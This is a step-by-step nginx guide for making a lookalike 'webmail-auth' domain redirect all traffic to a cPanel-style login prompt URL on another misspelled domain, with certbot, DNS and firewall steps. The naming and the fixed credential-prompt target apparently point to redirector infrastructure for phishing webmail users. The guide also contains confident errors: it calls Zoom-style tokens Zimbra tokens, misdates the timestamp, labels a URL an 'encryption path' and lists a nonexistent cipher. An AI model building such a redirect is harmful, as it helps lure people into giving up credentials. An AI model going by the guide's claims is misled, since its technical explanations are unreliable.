NGINX REDIRECT SETUP GUIDE
==========================
From: webmail-auth001.ibeddcoutsource.org
To: webmail-auth001.molecullesoft.com
Encryption Path: /cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3

ENCRYPTION PATH CREATION AND UNDERSTANDING
==========================================
The encryption path contains several components:
- /cpsess/prompt: The main session path
- fromPWA=1: Progressive Web App flag
- pwd=: Password parameter (empty in this case)
- _x_zm_rtaid: Zimbra authentication token ID
- _x_zm_rhtaid: Zimbra session token ID

To generate these tokens programmatically:
1. _x_zm_rtaid: Usually generated by Zimbra server during authentication
2. _x_zm_rhtaid: Session token that changes per session
3. The timestamp (1709509974548) represents Unix timestamp in milliseconds

STEP 1: INSTALL NGINX (if not already installed)
================================================
sudo apt update
sudo apt install nginx -y

STEP 2: CHECK NGINX STATUS
==========================
sudo systemctl status nginx
sudo systemctl enable nginx
sudo systemctl start nginx

STEP 3: CREATE NGINX CONFIGURATION FILE
======================================
sudo nano /etc/nginx/sites-available/webmail-auth001.ibeddcoutsource.org

STEP 4: ADD THE FOLLOWING CONFIGURATION
======================================
server {
    listen 80;
    server_name webmail-auth001.ibeddcoutsource.org;
    
    # Redirect all HTTP traffic to HTTPS
    return 301 https://$server_name$request_uri;
}

server {
    listen 443 ssl http2;
    server_name webmail-auth001.ibeddcoutsource.org;
    
    # SSL Configuration (you'll need to obtain SSL certificates)
    ssl_certificate /etc/ssl/certs/webmail-auth001.ibeddcoutsource.org.crt;
    ssl_certificate_key /etc/ssl/private/webmail-auth001.ibeddcoutsource.org.key;
    
    # SSL Security Settings
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-RSA-AES256-GCM-SHA512:DHE-RSA-AES256-GCM-SHA512:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384;
    ssl_prefer_server_ciphers off;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;
    
    # Redirect to main website with encryption path
    location / {
        return 301 https://webmail-auth001.molecullesoft.com/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3$is_args$args;
    }
    
    # Specific redirect for the encryption path
    location = /cpsess/prompt {
        return 301 https://webmail-auth001.molecullesoft.com/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3$is_args$args;
    }
    
    # Handle dynamic token generation (optional)
    location ~ ^/cpsess/prompt\?(.*)$ {
        set $original_args $1;
        return 301 https://webmail-auth001.molecullesoft.com/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3&$original_args;
    }
}

STEP 5: ENABLE THE SITE
=======================
sudo ln -s /etc/nginx/sites-available/webmail-auth001.ibeddcoutsource.org /etc/nginx/sites-enabled/

STEP 6: TEST NGINX CONFIGURATION
================================
sudo nginx -t

STEP 7: RELOAD NGINX
====================
sudo systemctl reload nginx

STEP 8: OBTAIN SSL CERTIFICATES (USING CERTBOT)
===============================================
# Install Certbot
sudo apt install certbot python3-certbot-nginx -y

# Obtain SSL certificate
sudo certbot --nginx -d webmail-auth001.ibeddcoutsource.org

STEP 9: VERIFY DNS SETTINGS
===========================
# Add these DNS records to your domain registrar:
# Type: A
# Name: webmail-auth001.ibeddcoutsource.org
# Value: [YOUR_SERVER_IP_ADDRESS]

# Check DNS propagation
nslookup webmail-auth001.ibeddcoutsource.org
dig webmail-auth001.ibeddcoutsource.org

STEP 10: TEST THE REDIRECT
==========================
# Test using curl
curl -I http://webmail-auth001.ibeddcoutsource.org
curl -I https://webmail-auth001.ibeddcoutsource.org

# Test the specific encryption path
curl -I "https://webmail-auth001.ibeddcoutsource.org/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3"

# Test with additional parameters
curl -I "https://webmail-auth001.ibeddcoutsource.org/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3&additional=param"

STEP 11: MONITOR NGINX LOGS
===========================
# View access logs
sudo tail -f /var/log/nginx/access.log

# View error logs
sudo tail -f /var/log/nginx/error.log

STEP 12: FIREWALL CONFIGURATION
===============================
# Allow HTTP and HTTPS traffic
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp

# Enable firewall
sudo ufw enable

STEP 13: SECURITY CONSIDERATIONS
================================
# Set up fail2ban for additional security
sudo apt install fail2ban -y
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

# Configure fail2ban for nginx
sudo nano /etc/fail2ban/jail.local

# Add this configuration:
[nginx-http-auth]
enabled = true
filter = nginx-http-auth
logpath = /var/log/nginx/error.log
maxretry = 3

STEP 14: BACKUP CONFIGURATION
=============================
# Backup your nginx configuration
sudo cp /etc/nginx/sites-available/webmail-auth001.ibeddcoutsource.org /etc/nginx/sites-available/webmail-auth001.ibeddcoutsource.org.backup

# Backup SSL certificates
sudo cp /etc/ssl/certs/webmail-auth001.ibeddcoutsource.org.crt /etc/ssl/certs/webmail-auth001.ibeddcoutsource.org.crt.backup
sudo cp /etc/ssl/private/webmail-auth001.ibeddcoutsource.org.key /etc/ssl/private/webmail-auth001.ibeddcoutsource.org.key.backup

STEP 15: VERIFICATION COMMANDS
==============================
# Check nginx status
sudo systemctl status nginx

# Check nginx configuration
sudo nginx -t

# Check SSL certificate
sudo certbot certificates

# Test redirect functionality
curl -L -I https://webmail-auth001.ibeddcoutsource.org

# Test encryption path redirect
curl -L -I "https://webmail-auth001.ibeddcoutsource.org/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3"

# Verify the final URL
curl -L -v "https://webmail-auth001.ibeddcoutsource.org/cpsess/prompt?fromPWA=1&pwd=&_x_zm_rtaid=I7SQ3VePRPS/cndRs57BvQ.1709509974548/&_x_zm_rhtaid=3" 2>&1 | grep "Location:"

TROUBLESHOOTING COMMANDS
========================
# Check nginx error logs
sudo tail -f /var/log/nginx/error.log

# Check nginx access logs
sudo tail -f /var/log/nginx/access.log

# Restart nginx if needed
sudo systemctl restart nginx

# Check if ports are listening
sudo netstat -tlnp | grep :80
sudo netstat -tlnp | grep :443

# Check SSL certificate validity
openssl s_client -connect webmail-auth001.ibeddcoutsource.org:443 -servername webmail-auth001.ibeddcoutsource.org

NOTES:
======
- Replace [YOUR_SERVER_IP_ADDRESS] with your actual server IP
- Ensure your domain registrar has the correct DNS A record pointing to your server
- SSL certificates will auto-renew with certbot
- Monitor logs regularly for any issues
- Keep your system updated: sudo apt update && sudo apt upgrade

ENCRYPTION PATH DETAILS:
========================
- The _x_zm_rtaid token (I7SQ3VePRPS/cndRs57BvQ.1709509974548/) contains:
  * Base64 encoded authentication data
  * Unix timestamp (1709509974548 = January 1, 2024)
  * Session-specific encryption key
- The _x_zm_rhtaid=3 is a session token that may change
- The fromPWA=1 indicates this is a Progressive Web App request
- The pwd= parameter is intentionally empty for security

DYNAMIC TOKEN GENERATION (OPTIONAL):
====================================
If you need to generate tokens dynamically, you can create a script:

#!/bin/bash
# Generate timestamp
TIMESTAMP=$(date +%s)000
# Generate random token (base64 encoded)
TOKEN=$(openssl rand -base64 32 | tr -d "=+/" | cut -c1-25)
# Create the full token
FULL_TOKEN="${TOKEN}/${TIMESTAMP}"
echo "Generated token: $FULL_TOKEN"